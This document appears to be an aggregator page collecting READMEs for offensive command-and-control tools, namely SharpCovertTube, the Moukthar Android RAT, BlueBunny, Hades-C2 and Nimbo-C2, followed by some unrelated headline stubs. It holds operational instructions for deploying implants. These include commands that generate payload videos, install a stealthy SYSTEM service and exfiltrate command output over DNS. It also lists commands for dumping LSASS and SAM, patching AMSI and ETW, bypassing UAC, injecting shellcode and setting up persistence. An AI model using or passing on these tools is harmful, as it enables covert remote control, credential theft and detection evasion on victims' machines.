SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube

SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.

The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.

It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.

Run the listener in your Windows system:

It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:

After finding there is a new video in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:

This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:

Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's collaborator:

As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.

There are some values you can change, you can find them in Configuration.cs file for the regular binary and the service binary. Only the first two have to be updated:

• channel_id (Mandatory!!!): Get your Youtube channel ID from here.
• api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
• payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.
• payload_aes_iv (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.
• seconds_delay (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.
• debug_console (Optional. Default: true): Show debug messages in console or not.
• log_to_file (Optional. Default: true): Write debug messages in log file or not.
• log_file (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.
• dns_exfiltration (Optional. Default: true): Exfiltrate command responses through DNS or not.
• dns_hostname (Optional. Default: ".test.org"): DNS hostname to exfiltrate the response from commands executed in the system.

You can generate the videos from Windows using Python3. For that, first install the dependencies:

pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus

Then run the generate_video.py script:

python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]

• TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.

• FILE (-f) is the path where the video is generated.

• COMMAND (-c) is the command to execute in the system.

• AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.

• AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.

Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:

python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami

Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:

python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000

You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.

It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:

InstallUtil.exe SharpCovertTube_Service.exe

You can then start it with:

net start "SharpCovertTube Service"

In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.

• File must be 64 bits!!! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who at the same time borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!

• This project is a port from covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about Casbaneiro and Numando malwares.

Moukthar - Android Remote Administration Tool

Remote adminitration tool for android

• Notifications listener
• SMS listener
• Phone call recording
• Image capturing and screenshots
• Persistence
• Read & write contacts
• List installed applications
• Download & upload files
• Get device location

• Clone repository console git clone https://github.com/Tomiwa-Ot/moukthar.git
• Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
• Set database credentials in c2-server/.env and web socket/.env
• Execute database.sql
• Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
• Modify /etc/apache2/apache2.conf xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
• Set C2 server and web socket server address in client functionality/Utils.java ```java public static final String C2_SERVER = "http://localhost";

public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target

• Auto scroll logs on dashboard

BlueBunny - BLE Based C2 For Hak5's Bash Bunny

C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.

Overview

Structure

Installation & Start

1. Install required dependencies

pip install pygatt "pygatt[GATTTOOL]"

Make sure BlueZ is installed and gatttool is usable

sudo apt install bluez

2. Download BlueBunny's repository (and switch into the correct folder)

git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2

3. Start the C2 server

sudo python c2-server.py

4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
5. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).

Manual communication with the Bash Bunny through Python

You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

Example Code

# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE

# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"

# Initialize BunnyLE
BunnyLE.init()

# Connect to your Bash Bunny
bb = BunnyLE.connect()

# Send the data and let it execute
BunnyLE.send(bb, data, d_type)

Troubleshooting

Connecting your Bash Bunny doesn't work? Try the following instructions:

• Try connecting a few more times
• Check if your bluetooth adapter is available
• Restart the system your C2 server is running on
• Check if your Bash Bunny is running the BlueBunny payload properly
• How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

Bugs within BlueZ

The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.

• Timeout after 5.0 seconds
• Unknown error while scanning for BLE devices

Working on...

• Remote shell access
• BLE exfiltration channel
• Improved connecting process

Additional information

As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.

Hades-C2 - Hades Basic Command And Control Server

Hades is a basic Command & Control server built using Python. It is currently extremely bare bones, but I plan to add more features soon. Features are a work in progress currently.

This is a project made (mostly) for me to learn Malware Development, Sockets, and C2 infrastructure setups. Currently, the server can be used for CTFs but it is still a buggy mess with a lot of things that need ironed out.

I am working on a Web UI using Flask currently so new features are being put on hold until then, if you face any issues then please be sure to create an issues request.

Features

• Windows Implant
  • Python Implant
  • Executable Implant
  • Powershell Cradle
• Linux Implant
• Basic Command & Control functionality
  • CMD Commands
  • BASH Commands
• Basic Persistence
  • Linux Cronjob
  • Windows Registry Autorun

Getting Started

Help

Listener Commands
---------------------------------------------------------------------------------------

listeners -g --generate           --> Generate Listener

Session Commands
---------------------------------------------------------------------------------------

sessions -l --list                --> List Sessions
sessions -i --interact            --> Interact with Session
sessions -k --kill <value>        --> Kill Active Session

Payload Commands
---------------------------------------------------------------------------------------

winplant.py                       --> Windows Python Implant
exeplant.py                       --> Windows Executable Implant
linplant.py                       --> Linux Implant
pshell_shell                      --> Powershell Implant

Client Commands
--------   -------------------------------------------------------------------------------

persist / pt                      --> Persist Payload (After Interacting with Session) 
background / bg                   --> Background Session
exit                              --> Kill Client Connection

Misc Commands
---------------------------------------------------------------------------------------

help / h                          --> Show Help Menu
clear / cls                       --> Clear Screen

Prerequisites

• Python3 Pip
• Colorama

Installation

git clone https://github.com/lavender-exe/Hades-C2.git
cd Hades-C2
# Windows
python install.py
# Linux
python3 install.py
python3 hades-c2.py

Server:

1. Run the server using python hades-c2.py
2. Run listeners -g / --generate to generate a listener
3. Select the IP and Port for the listener

Implant:

1. Create an implant using winplant.py, linplant.py or exeplant.py
2. Run the implant on the target machine

Roadmap

See the open issues for a list of proposed features (and known issues).

Contributing

Contributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are greatly appreciated.

• If you have suggestions for adding or removing projects, feel free to open an issue to discuss it, or directly create a pull request after you edit the README.md file with necessary changes.
• Please make sure you check your spelling and grammar.
• Create individual PR for each suggestion.
• Please also read through the Code Of Conduct before posting your first idea as well.

Creating A Pull Request

1. Fork the Project
2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
3. Commit your Changes (git commit -m 'Add some AmazingFeature')
4. Push to the Branch (git push origin feature/AmazingFeature)
5. Open a Pull Request

Future Plans

• Better Implant Functions
• Add more persistence methods
• Add more command functionality
• Use Nim/C++ to create cross-platform malware
• Add more Quality of Life features
• Flask Web Interface

License

Distributed under the MIT License. See LICENSE for more information.

Authors

• Lavender - Nerd - Lavender - Created Project

Acknowledgements

• Joe Helle

Google Warns How Hackers Could Abuse Calendar Service as a Covert C2 Channel

Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

About

Nimbo-C2 is yet another (simple and lightweight) C2 framework.

Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.

All server components are written in Python:

• HTTP listener that manages the agents.
• Builder that generates the agent payloads.
• Nimbo-C2 is the interactive C2 component that rule'em all!

My work wouldn't be possible without the previous great work done by others, listed under credits.

Features

• Build EXE, DLL, ELF payloads.
• Encrypted implant configuration and strings using NimProtect.
• Packing payloads using UPX and obfuscate the PE section names (UPX0, UPX1) to make detection and unpacking harder.
• Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable by the config.jsonc).
• Auto-completion in the C2 Console for convenient interaction.
• In-memory Powershell commands execution.
• File download and upload commands.
• Built-in discovery commands.
• Screenshot taking, clipboard stealing, audio recording.
• Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
• LSASS and SAM hives dumping.
• Shellcode injection.
• Inline .NET assemblies execution.
• Persistence capabilities.
• UAC bypass methods.
• ELF loading using memfd in 2 modes.
• And more !

Installation

Easy Way

1. Clone the repository and cd in

git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2

2. Build the docker image

docker build -t nimbo-dependencies .

3. cd again into the source files and run the docker image interactively, expose port 80 and mount Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux replace ${pwd} with $(pwd).

cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

Easier Way

git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

Usage

First, edit config.jsonc for your needs.

Then run with: python3 Nimbo-C2.py

Use the help command for each screen, and tab completion.

Also, check the examples directory.

Main Window

Nimbo-C2 > help

    --== Agent ==--
    agent list                    ->  list active agents
    agent interact <agent-id>     ->  interact with the agent
    agent remove <agent-id>       ->  remove agent data

    --== Builder ==--
    build exe                     ->  build exe agent (-h for help)
    build dll                     ->  build dll agent (-h for help)
    build elf                     ->  build elf agent (-h for help)

    --== Listener ==--
    listener start                ->  start the listener
    listener stop                 ->  stop the listener
    listener status               ->  print the listener status

    --== General ==--
    cls                           ->  clear the screen
    help                          ->  print this help message
    exit                          ->  exit Nimbo-C2

Nimbo-2 [d337c406] > help

    --== Send Commands ==--
    cmd <shell-command>                    ->  execute a shell command
    iex <powershell-scriptblock>           ->  execute in-memory powershell command

    --== File Stuff ==--
    download <remote-file>                 ->  download a file from the agent (wrap path with quotes)
    upload <loal-file> <remote-path>       ->  upload a file to the agent (wrap paths with quotes)

    --== Discovery Stuff ==--
    pstree                                 ->  show process tree
    checksec                               ->  check for security products
    software                               ->  check for installed software

    --== Collection Stuff ==--
    clipboard                              ->  retrieve clipboard
    screenshot                             ->  retrieve screenshot
       audio <record-time>                    ->  record audio

    --== Post Exploitation Stuff ==--
    lsass <method>                         ->  dump lsass.exe [methods:  direct,comsvcs] (elevation required)
    sam                                    ->  dump sam,security,system hives using reg.exe (elevation required)
    shellc <raw-shellcode-file> <pid>      ->  inject shellcode to remote process
    assembly <local-assembly> <args>       ->  execute .net assembly (pass all args as a single string using quotes)
                                               warning: make sure the assembly doesn't call any exit function

    --== Evasion Stuff ==--
    unhook                                 ->  unhook ntdll.dll
    amsi                                      ->  patch amsi out of the current process
    etw                                    ->  patch etw out of the current process

    --== Persistence Stuff ==--
    persist run <command> <key-name>       ->  set run key (will try first hklm, then hkcu)
    persist spe <command> <process-name>   ->  persist using silent process exit technique (elevation required)

    --== Privesc Stuff ==--
    uac fodhelper <command> <keep/die>     ->  elevate session using the fodhelper uac bypass technique
    uac sdclt <command> <keep/die>         ->  elevate session using the sdclt uac bypass technique

    --== Interaction stuff ==--
    msgbox <title> <text>                  ->  pop a message box (blocking! waits for enter press)
       speak <text>                           ->  speak using sapi.spvoice com interface

    --== Communication Stuff ==--
    sleep <sleep-time> <jitter-%>          ->  change sleep time interval and jitter
    clear                                  ->  clear pending commands
    collect                                ->  recollect agent data
    kill                                   ->  kill the agent (persistence will still take place)

    --== General ==--
    show                                   ->  show agent details
    back                                   ->  back to main screen
    cls                                    ->  clear the screen
    help                                   ->  print this help message
    exit                                   ->  exit Nimbo-C2

Nimbo-2 [51a33cb9] > help

    --== Send Commands ==--
    cmd <shell-command>                    ->  execute a terminal command 

    --== File Stuff ==--
    download <remote-file>                 ->  download a file from the agent (wrap path with quotes)
    upload <local-file> <remote-path>      ->  upload a file to the agent (wrap paths with quotes)

    --== Post Exploitation Stuff ==--
    memfd <mode> <elf-file> <commandline>  ->  load elf in-memory using the memfd_create syscall
                                               implant mode: load the elf as a child process and return
                                               task mode: load the elf as a child process, wait on it, and get its output when it's done
                                                  (pass the whole commandline as a single string using quotes)

    --== Communication Stuff ==--
    sleep <sleep-time> <jitter-%>          ->  change sleep time interval and jitter
    clear                                  ->  clear pending commands
    collect                                ->  recollect agent data
    kill                                   ->  kill the agent (persistence will still take place)

    --== General ==--
    show                                   ->  show agent details
    back                                   ->  back to main screen
    cls                                    ->  clear the screen
    help                                   ->  print this help message
    exit                                   ->  exit Nimbo-C2
   

Researchers Expose Over 80 ShadowPad Malware C2 Servers

A Growing Number of Malware Attacks Leveraging Dark Utilities 'C2-as-a-Service'